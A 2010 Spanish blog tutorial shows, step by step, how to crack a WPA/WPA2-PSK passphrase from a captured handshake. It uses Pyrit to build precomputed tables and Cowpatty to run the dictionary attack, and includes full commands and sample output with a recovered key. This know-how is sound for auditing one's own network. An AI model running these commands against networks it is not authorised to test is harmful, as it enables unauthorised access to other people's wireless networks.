lunes, 21 de junio de 2010

Pyrit - Cowpatty

Bien, aqui esplicare que hacer con pyrit, esa aplicacion que instalamos en la entrada anterior.

Una de las opciones que nos permite es crear en una Rainbow Tables a partir de un ESSID. En este caso he usado un ESSID ficticio con nombre Ubuntusaurio pero lo deberemos de adecuar al cual este destinado:

pyrit -e Ubuntusaurio create_essid

Pyrit administra de dos maneras distintas las Rainbow Tables; batchprocess - con el que procesamos las tablas para un uso posterior, y passthrough - con el cual procesamos el diccionario escribiendo las tablas en la salida estandar para un uso inmediato, con lo cual, lo automatizamos el ataque. Pero tambien podemos usar las dos opciones simultaneamente.

Si quieres usar passthrough en Pyrit con cowpatty debes de hacer algo asi:

pyrit -e Ubuntusaurio -f wpa.lst passthrough | cowpatty -d - -r handshake-01.cap -s Ubuntusaurio


Si queremos usar batchprocess tendremos que usar este comando cambiando el wordlist.txt por el diccionario que vallamos a usar:

pyrit -f worldlist.txt import_passwords


Con todo esto listo, solo nos queda dar inicio al proceso de creacion de las tablas:

pyrit batchprocess

Pyrit permite usar las tablas creadas en formato compatible con Cowpatty o con Airolib-ng de la suite Aircrack-ng. En este ejemplo vamos a usar Cowpatty. Procedemos a exportar el diccionario desde Pyrit:

pyrit -e Ubuntusaurio -f rainbowtable.cow export_cowpatty

Luego importamos el diccionario desde Cowpatty para procesarlo:

cowpatty -d rainbowtable.cow -s Ubuntusaurio -r handshake-01.cap

donde handshake-01.cap es el archivo con el handshake capturado anteriomente. Si tienes suerte y tu clave esta dentro del archivo deberia aparecer algo asi:

cowpatty -d rainbowtable.cow -s Ubuntusaurio -r handshake-01.cap
cowpatty 4.6 - WPA-PSK dictionary attack.

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 10000: elipkcot
key no. 20000: queerness
key no. 30000: bynumber
key no. 40000: neuheikendorferweg
key no. 50000: biologistic
key no. 60000: loessoid
key no. 70000: surreverence
key no. 80000: consalvi
key no. 90000: needputenv
key no. 100000: yratenom
key no. 110000: fire-fly
key no. 120000: schweikardt
key no. 130000: cardphone
key no. 140000: nighness
key no. 150000: XXX/Operator
key no. 160000: hydroxyzine
key no. 170000: tectocephaly
key no. 180000: dux/SimCity
key no. 190000: nibelungenstr
key no. 200000: ResolveAlias

The PSK is "IWill51Try01Shoot9The32Web".

205478 passphrases tested in 1.64 seconds: 125473.71 passphrases/seco
nd

Si quieres puedes probar a saltarte el proceso de creación del rainbow table y trabajar directamente con el diccionario en texto plano (para ello cambia "-d rainbowyable.cow" por "-f RutaCompletaATuDiccionario". Si haces esto comprobarás la tremenda diferencia de velocidad que implica usar o no Pyrit para preprocesar el diccionario.

Informacion extraida de www.elhacker.net

No hay comentarios:

Publicar un comentario